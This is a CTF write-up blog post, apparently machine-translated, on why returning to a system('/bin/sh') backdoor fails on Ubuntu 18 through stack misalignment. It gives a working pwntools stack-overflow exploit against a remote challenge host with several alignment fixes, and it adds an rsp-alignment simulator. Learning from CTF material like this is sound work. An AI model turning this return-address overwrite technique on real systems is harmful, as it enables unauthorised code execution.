
Issues that may occur when calling system in 64-bit ELF in Ubuntu18 (「Pwn」Ubuntu18 中64位ELF在调用system时候可能出现的问题)

· 2 min read
Muel - Nova
Anime Would PWN This WORLD into 2D
🤖AI Summary

In this post nova looks at a problem that can occur when a 64-bit ELF running on Ubuntu 18 calls the system function. The post describes a CTF challenge that is fairly simple and involves a basic stack overflow. However, when the author performed the same steps against the remote server it failed, and the author was able to reproduce the problem on their own Ubuntu 18 system.

Through further research the author found that on Ubuntu 18 and later, libc requires stack balance (alignment) to be taken into account when a 64-bit ELF calls the system function. The fix is to change the length of the payload or to perform a stack pivot, which avoids the unbalanced stack.

The author would also like to investigate the stack balance problem further using gdb, but because gdb on Ubuntu 18 is currently misbehaving, a deeper analysis is not yet possible. Finally, the post lists a few reference blogs to help readers learn more about the technical details of this problem.

Recently, when I set up Ubuntu18 and was testing it, I encountered a problem.

After researching for a long time, I finally solved it and decided to take some notes.

Challenge -- Buuoj -- RIP

Problem

This challenge is a basic stack overflow problem. There is a backdoor function that directly calls system("/bin/sh"); with no protections enabled. In theory, overwriting the return address should be sufficient.

Indeed, it worked fine during local testing, but issues arose during remote testing.

Upon further investigation, I discovered that when a 64-bit ELF program on Ubuntu18 or later calls the system function, stack balance has to be taken into account: the glibc implementation of system expects the stack pointer to be 16-byte aligned, so returning straight to the backdoor function leaves it misaligned and the call crashes.

Solution

Changing the payload length or performing stack pivoting can resolve this issue.

The main idea is to shift the stack pointer by 8 bytes (or move the stack somewhere else entirely) so that it is aligned by the time system is entered.

Here is an example exploit:

from pwn import *
context(log_level='debug', arch='amd64', os='linux')

# sh = process("./pwn1")
sh = remote("node4.buuoj.cn", 29726)

# sh.recvuntil('please input\n')

backdoor_addr = 0x0401186
# payload = b'a'*(0xf+8) + p64(backdoor_addr) # Normal idea, but due to alignment issues, it will fail
# payload = b'a'*0xf + p64(backdoor_addr) # Exploit 1, not very clear why this works:<
# payload = b'a'*(0xf+8) + p64(backdoor_addr) + p64(backdoor_addr - 1) # Exploit 2, backdoor_addr - 1 corresponds to a 'retn', can be replaced with others for stack balance
payload = b'a'*(0xf+8) + p64(backdoor_addr + 1) # Exploit 3, +1 aligns the address checked for alignment to 0x10 in call_system function
"""
It doesn't have to be +1. Aligning up to 16 times should work. If not, try stack pivoting.
"""
sh.sendline(payload)
sh.interactive()
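To make the alignment argument concrete, here is an added example that is not part of the original post. It models only the stack pointer, not the binary: a small simulator walks the return-address chain from each payload variant and checks whether rsp has the remainder the x86-64 SysV ABI requires on function entry (rsp % 16 == 8, i.e. 16-byte aligned before the call). The instruction layout assumed at the backdoor (a 1-byte push rbp followed by a call to system, with a ret one byte before it) is an assumption modelled on typical gcc output, not something taken from the challenge binary, and the ret gadget variant is modelled with the ret executed before the jump to the backdoor, which is where it can adjust rsp. The starting rsp value is constructed.

```python
import struct

# ---- Constructed model (added example, not code from the original post) ----
# Address from the page's exploit; the instructions assumed to live at it and
# around it are an assumption modelled on typical gcc output.
BACKDOOR_ADDR = 0x401186
PADDING = 0xF + 8  # bytes from the buffer start to the saved return address (from the page)

# Each gadget is a list of (mnemonic, rsp delta in bytes). Only rsp matters for
# alignment, so registers and memory are not modelled. 'call' pushes the return
# address, so the callee sees rsp 8 bytes lower than the caller had it.
GADGETS = {
    BACKDOOR_ADDR - 1: [("ret", +8)],                       # assumption: a lone 'ret' (c3) precedes the function
    BACKDOOR_ADDR:     [("push rbp", -8), ("mov rbp, rsp", 0),
                        ("lea rdi, [rip+bin_sh]", 0), ("call system", -8)],
    BACKDOOR_ADDR + 1: [("mov rbp, rsp", 0),                # +1 skips the 1-byte 'push rbp' (0x55)
                        ("lea rdi, [rip+bin_sh]", 0), ("call system", -8)],
}

# rsp right after main's final 'ret' has consumed the overwritten return slot.
# A main entered normally leaves rsp 16-byte aligned here; constructed value.
RSP_AFTER_MAIN_RET = 0x7FFC_DEAD_B000


def p64(value):
    """Little-endian 8-byte pack, the same encoding pwntools' p64 uses on amd64."""
    return struct.pack("<Q", value)


def build_payload(*addrs):
    """Padding up to the saved return address, then the return-address chain."""
    return b"a" * PADDING + b"".join(p64(a) for a in addrs)


def chain_from_payload(payload):
    """Decode the qword return-address chain that follows the padding."""
    tail = payload[PADDING:]
    usable = len(tail) - len(tail) % 8
    return [struct.unpack("<Q", tail[i:i + 8])[0] for i in range(0, usable, 8)]


def rsp_at_system_entry(payload, rsp=RSP_AFTER_MAIN_RET):
    """Apply each gadget's rsp effect in chain order until system() is entered.

    Returns (rsp at system entry, trace of (address, mnemonic, rsp after))."""
    trace = []
    for addr in chain_from_payload(payload):
        if addr not in GADGETS:
            raise ValueError(f"no gadget modelled at {addr:#x}")
        for mnemonic, delta in GADGETS[addr]:
            rsp += delta
            trace.append((f"{addr:#x}", mnemonic, f"{rsp:#x}"))
            if mnemonic == "call system":
                return rsp, trace
    raise ValueError("chain never reaches system()")


def system_entry_ok(payload):
    """SysV ABI: on function entry rsp % 16 == 8 (it was 16-aligned before the call).

    glibc's system() executes a 16-byte 'movaps' on a stack slot whose alignment
    follows from exactly this remainder, so a wrong value here is the crash the
    post describes."""
    rsp, _ = rsp_at_system_entry(payload)
    return rsp % 16 == 8


if __name__ == "__main__":
    variants = {
        "plain return to backdoor": build_payload(BACKDOOR_ADDR),
        "ret gadget, then backdoor": build_payload(BACKDOOR_ADDR - 1, BACKDOOR_ADDR),
        "backdoor + 1 (skip push rbp)": build_payload(BACKDOOR_ADDR + 1),
    }
    for name, payload in variants.items():
        rsp, trace = rsp_at_system_entry(payload)
        verdict = "aligned, system() runs" if system_entry_ok(payload) else "MISALIGNED, movaps faults"
        print(f"{name:30s} rsp at entry = {rsp:#x} -> {verdict}")
        for step in trace:
            print("    ", *step)
```

The plain return leaves rsp % 16 == 0 at system entry, which is why the "normal idea" payload crashes even though the return address is correct; both fixes shift rsp by exactly 8 bytes before the call, one by adding a ret (which pops a qword) and the other by skipping the push rbp (which would have pushed one).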

In-depth Analysis

Here, I plan to delve into the stack at this point, which also serves as an initial exploration of gdb.

Oh no, it seems like gdb in Ubuntu18 is not working properly. I'll add more details once it's fixed:<

Reference Blogs

Issues with calling system function in some 64-bit glibc payloads

Stack balance issues involved in ret2text

Solving the program coredump issue caused by MOVAPS instruction after upgrading to gcc7.3

Info: This content is generated by ChatGPT and might be wrong or incomplete; refer to the Chinese version if you find something wrong.
